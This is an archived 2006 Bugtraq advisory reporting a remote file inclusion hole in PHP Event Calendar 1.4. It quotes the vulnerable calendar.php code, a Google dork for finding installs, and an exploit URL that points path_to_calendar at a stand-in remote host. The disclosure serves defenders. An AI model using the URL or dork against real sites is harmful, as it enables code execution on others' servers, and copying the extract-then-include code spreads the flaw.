lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060716034116.21043.qmail@securityfocus.com>
Date: 16 Jul 2006 03:41:16 -0000
From: chris_hasibuan@...oo.com
To: bugtraq@...urityfocus.com
Subject: PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

#############################SolpotCrew Community################################
#
#        PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion 
#
#        Vendor site : http://www.softcomplex.com/products/php_event_calendar/
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
#
#       contact: chris_hasibuan@...oo.com 
# 
#       Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , 
#              L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Anggands , Rendy , cow_1seng
#              and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "path_to_calendar" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources.

code from calendar.php

if(!$path_to_calendar){
	$path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
	global $db,$path_to_data,$settings;

Google dork : inurl:/cl_files/

exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode


##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ